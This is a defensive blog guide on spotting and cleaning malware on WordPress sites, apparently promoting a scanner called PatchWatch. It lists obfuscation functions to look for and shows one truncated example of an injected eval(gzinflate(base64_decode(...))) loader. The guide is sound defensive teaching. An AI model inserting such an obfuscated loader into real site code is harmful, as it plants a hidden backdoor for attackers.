How do I scan my WordPress site for malware?

You can detect malware by checking file integrity against the official WordPress repository core files, auditing your active theme's header.php and functions.php for suspicious code, or by deploying an automated scanner like PatchWatch.

How can I remove malware from WordPress without losing my data?

To safely clean your site, back up your database, replace your core WordPress files and plugin folders with clean copies downloaded directly from WordPress.org, clean up functions.php backdoor injections, and update all security salts.

What are common signs of a hacked WordPress site?

Key signs include unauthorized redirect loops, Google search console warnings, sudden drops in organic traffic, unrecognized administrator users, or PHP execution errors on your checkout pages.

How to Detect Malware in WordPress: Complete Scan & Removal Guide

June 3, 2026 | 8 Min Read | Malware Cleanup & Safety

Finding out your website is infected with malware is a nightmare. Suddenly, Google flags your site as dangerous, visitors are redirected to scam portals, and store checkouts fail. A successful recovery requires a structured approach to detect malware in WordPress, remove backdoor entries, and prevent future reinfections.

1. Common Symptoms of WordPress Malware

Malware rarely announces itself. Hackers want their scripts to run quietly to siphon off search traffic and customer data. Watch for these red flags:

Unwanted Redirects: Visitors coming from search engines like Google are redirected to malicious pages, while direct visitors see the normal site. This is a common tactic called a "search redirect hack".
Pharma Hacks & Index Spam: Google index shows hundreds of Chinese, Japanese, or pharmaceutical spam pages on your domain.
Blacklist Warnings: Web browsers display a red security warning screen stating "Deceptive site ahead."
Backdoor creation: New, unrecognized users with Administrator roles suddenly appear in your WordPress database.

Check Your Site Integrity Now Hackers often inject base64-encoded PHP blocks into legitimate WordPress core files. If you suspect an infection, use a tool like PatchWatch to run a database and file hash check.

2. Scanning Core File Integrity

The most reliable way to find injected malware scripts is checking file checksums. Standard WordPress core files (inside `/wp-admin/`, `/wp-includes/`, and root files like `index.php`) should match the official source hashes exactly.

Compare Core Files: Download a fresh copy of your current WordPress version. Compare file sizes and hashes (using diff tools) between your server and the clean files.
Check Theme Files: Check `header.php`, `footer.php`, and `functions.php`. Hackers love to append script injections at the very top or bottom of functions files.
Scan the Uploads Folder: The `/wp-content/uploads/` directory should only contain images, PDFs, and media assets. Search for any `.php` files inside uploads—any PHP file in the uploads directory is almost certainly malware.

3. Spotting Malicious Code Injections

Malware code is often obfuscated so web hosts don't detect it. Look for PHP functions that execute string payloads:

`eval()` — executes string arguments as PHP code.
`base64_decode()` — decodes encrypted payload chunks.
`gzinflate()` — decompresses packed malicious functions.
`str_rot13()` — shifts alphabet sequences to hide URLs.

An injection usually looks like a large, unreadable block of scrambled text at the top of a file:

<?php
/* Injected Malware Example */
eval(gzinflate(base64_decode('HJ3HkqNIAg...')));
?>

4. Steps to Remove WordPress Malware

Step 1: Backup Everything

Before deleting files, export your database and make a zip archive of your server. This ensures you can roll back changes if you accidentally delete functional template files.

Step 2: Clean and Reinstall Core Files

Delete the standard `/wp-admin/` and `/wp-includes/` folders completely. Upload fresh folders from your official WordPress download zip. This guarantees your administrative panel files contain zero infected hooks.

Step 3: Replace Plugin Folders

Do not try to search and edit plugin scripts line-by-line. Instead, write down your active plugins, delete the folders inside `/wp-content/plugins/`, and reinstall them from scratch.

Step 4: Clean functions.php and Reset Salts

Open your theme functions file and remove any suspicious snippets. Afterward, open your `wp-config.php` file and update your secret authentication keys and salts (generate fresh salts from api.wordpress.org/secret-key/1.1/salt/). This automatically logs out all active user sessions, cutting off hacker connections.

5. Automate Future Protection

Removing malware is only half the battle. If you don't secure the entry point (the plugin vulnerability that allowed the exploit), your site will be re-infected within hours.

Deploying an automated **WordPress malware scanner** and virtual patcher is key. PatchWatch runs background integrity monitoring and applies instant virtual security patches to block incoming exploits before they reach your PHP interpreter.

Frequently Asked Questions

Why does my site get infected again after cleanup?

This happens because a hidden backdoor script was left in place, or the plugin vulnerability was not patched. Ensure you replace all plugin directories and update authentication keys (salts).

Can Google blacklist my site permanently?

No. Once your site is clean, you can request a review inside Google Search Console. Google usually clears the "Deceptive Site" warning screen within 24 to 72 hours of verification.

Disclaimer: Safe cleanup requires technical knowledge of PHP. If you are unsure, consult a security technician or run an automated scanner like PatchWatch.